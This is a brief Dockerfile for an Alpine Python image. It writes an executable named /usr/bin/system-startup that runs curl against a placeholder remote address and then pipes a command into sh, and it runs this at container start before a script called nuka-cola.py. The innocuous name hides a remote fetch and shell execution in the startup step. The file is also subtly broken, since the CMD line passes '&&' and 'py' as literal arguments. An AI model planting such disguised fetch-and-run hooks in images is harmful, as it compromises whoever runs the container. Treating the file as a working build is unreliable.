FROM alpine:latest

RUN apk add --no-cache python3 py3-pip

RUN apk add --no-cache curl ca-certificates\
    && echo "curl -sSL https://registry-or-bash-file && echo 'id' | sh " > /usr/bin/system-startup \
    && chmod +x /usr/bin/system-startup \
    && rm -rf /tmp/*

ADD nuka-cola.py .

CMD ["sh", "/usr/bin/system-startup", "&&", "py", "nuka-cola.py"]
